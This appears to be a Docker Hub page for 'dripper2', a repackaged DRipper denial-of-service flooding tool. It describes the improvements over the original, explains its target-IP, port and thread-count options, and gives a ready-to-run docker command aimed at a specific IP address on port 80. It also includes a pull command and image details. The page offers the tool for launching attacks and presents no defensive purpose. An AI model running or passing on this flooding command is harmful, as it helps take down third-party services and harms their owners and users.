This is an optimized version of DRipper. Here is original code: https://gist.github.com/scamp/33807688d0ebdcfbd4c29a4b992a8b54, you can see there a lot of cons like extra requests to Facebook and validator.w3.com, trying establishing connection with attacked resource (but there is no need in it if you want to send a UDP packet). Also the old version is inefficient: you need run several processes to have your processor busy.
Params:
-s - IP;
-p - port (default 80);
-t - threads count. The most important setting. Try to keep the processor busy up to 100%.
docker run -ti --rm alexmon1989/dripper2:latest -s 178.172.163.130 -p 80 -t 100
Content type
Image
Digest
Size
76 MB
Last updated
over 4 years ago
docker pull alexmon1989/dripper2